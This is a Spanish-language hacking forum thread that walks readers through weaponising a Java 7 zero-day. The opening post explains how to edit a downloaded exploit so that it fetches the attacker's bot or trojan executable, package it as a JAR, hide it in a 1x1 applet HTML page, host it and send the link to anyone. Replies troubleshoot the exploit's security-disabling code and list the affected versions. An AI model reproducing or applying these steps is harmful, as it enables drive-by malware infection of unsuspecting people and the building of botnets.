Imagen


Investigadores de seguridad de FireEye han informado de una nueva vulnerabilidad de día cero en Java que está siendo explotada activamente en Internet. Los runtime más recientes (JRE 1.7x) son también vulnerables.

Esta noticia e información esta siendo propagada por todos los Foros, Blogs de Seguridad, Redes Sociales, etc... pero solo informan de que "trata" oh como prevenirlo.

En este caso, les enseñare como aprovecharse de esta vulnerabilidad, mediante el Exploit en .JAR que ha sido compilado para explotar dicha vulnerabilidad.

Empecemos.

Descargamos el Exploit:
[Enlace externo eliminado para invitados]
Pass: calebbucker

Necesitaremos el Programa Eclipse:
[Enlace externo eliminado para invitados]
Disponible 32 y 64 bits, descargue dependiendo de su S.O

Instalamos JAVA 7: [Enlace externo eliminado para invitados]

Iniciamos Eclipse, seleccionamos File - Import:

Imagen


Seleccionamos General - Proyectos Existentes en el Área de Trabajo:

Imagen


Le damos Next, ahora click en Browser y seleccionamos la ruta del exploit descomprimido, en mi caso es C:\Documents and Settings\TioSam\Escritorio\exploit2

Imagen


Seleccionamos Finish, ahora en el proyecto importado, abrimos el archivo Gondvv.java y editamos la linea URL website = new URL("DOWNLOADPATH"); en DOWNLOADPATCH colocaremos la url de nuestro exe (bot, troyano) la cual quedaria: URL website = new URL("[Enlace externo eliminado para invitados]");

Imagen


Ahora, abrimos el archivo applet1.java y le damos RUN, si el archivo logra abrir entonces quiere decir que todo funciona bien; si no abre compruebe que tiene JAVA 7 instalado.

Imagen

Imagen


Ahora, exportamos el Proyecto, click derecho sobre exploit2 y seleccionamos Export:

Imagen


El proyecto tiene que ser guardado en formato JAR, por lo tanto seleccionamos Java - Jar file:

Imagen


Seleccionamos Next, ahora click en Browser y seleccionamos la carpeta donde se guardara el archivo Jar en mi caso es: C:\Documents and Settings\TioSam\Escritorio\TEST\test.jar

Imagen


Terminado ese paso le damos Next, Next y Finish.

Ahora, creamos un archivo html con el siguiente código:

Código: Seleccionar todo

<html><head></head><body><applet archive="JARNOMBRE.jar" code="applet1.class" width="1" height="1"></applet></body></html>
En mi caso el codigo queda de la siguiente manera:

Código: Seleccionar todo

<html><head></head><body><applet archive="test.jar" code="applet1.class" width="1" height="1"></applet></body></html>
Imagen


Esos archivos la subimos en nuestro Host, de preferencia de pago.

Ahora solo queda enviar el link: [Enlace externo eliminado para invitados] a cualquier persona.

En este caso, he configurado una Botnet (Aldi) la cual al momento que abri dicho link quede infectado :(

Imagen


Esta vulnerabilidad también puede ser explotada desde Metasploit:
[Enlace externo eliminado para invitados]

Espero no sean tan "ingenuos" en abrir cualquier link que le envian, por lo menos tengan desactivado JAVA hasta que salga el respectivo parche.

Saludos.
Imagen
muy interesante, gracias.. pero de que vulnerabilidad se trata? (CVE-XXXX?)
aunque supongo que sera la mas famosa que salio hace unos dias y por la que tuvieron que actualizar desde Oracle...
porque la otra que salio despues, tras el ultimo parche, creo que aun no ha sido publicada :(

saludos y gracias de nuevo
muy buen post!! te felicito!!
mucha gente va a caer con este hueco de seguridad si no se tiene cuidado....
espero q saquen pronto el parche xq estamos todos jugados xq java es tan comundo como flash player!!
noobhack escribió:muy interesante, gracias.. pero de que vulnerabilidad se trata? (CVE-XXXX?)
aunque supongo que sera la mas famosa que salio hace unos dias y por la que tuvieron que actualizar desde Oracle...
porque la otra que salio despues, tras el ultimo parche, creo que aun no ha sido publicada :(

saludos y gracias de nuevo
Hola, que tal.

Si de hecho, es la ultima vulnerabilidad que se ha publicado en Java 7, el titulo mismo lo indica.

Mas Info sobre esta Vul: [Enlace externo eliminado para invitados]

PD: No se olviden subir el archivo .jar - .html y applet1.class

Saludos.
Imagen
cuando le doy a run me tira este error:

java.lang.NoSuchMethodException: <unbound>=Class.getField(Class, "acc");
at java.beans.Statement.invokeInternal(Unknown Source)
at java.beans.Statement.access$000(Unknown Source)
at java.beans.Statement$2.run(Unknown Source)
at java.security.AccessController.doPrivileged(Native Method)
at java.beans.Statement.invoke(Unknown Source)
at java.beans.Expression.execute(Unknown Source)
at cve2012xxxx.Gondvv.SetField(Gondvv.java:66)
at cve2012xxxx.Gondvv.disableSecurity(Gondvv.java:45)
at cve2012xxxx.Gondvv.init(Gondvv.java:74)
at sun.applet.AppletPanel.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)

me abre el form y me dice applet iniciado pero quisiera saber si a alguien mas le pasa.
Imagen

(cuanto más sabes, más cuenta te das de lo poco que sabes).

Mostrar/Ocultar

ademas de cuando le doy a exportar me sale una alerta:

JAR export finished with warnings. See details for additional information.

cuando lo abro desde iexplorer, se queda cargando y luego nada se debería abrir un simple notepad. Eso si queda en los procesos abierto el proceso java.exe

a alguien mas le pasa esto?
Imagen

(cuanto más sabes, más cuenta te das de lo poco que sabes).

Mostrar/Ocultar

Verifica si tenes instalado Java7, luego fijate los procesos que no este corriendo ningun otro bot.

El archivo pruebalo desde Google Chorme.
Imagen
Funciona de java 7 update 1 hasta el update 6

En el subforo de general colocaron un link mas sencillo donde ejecuta el notepad Mich
Responder

Volver a “Exploits”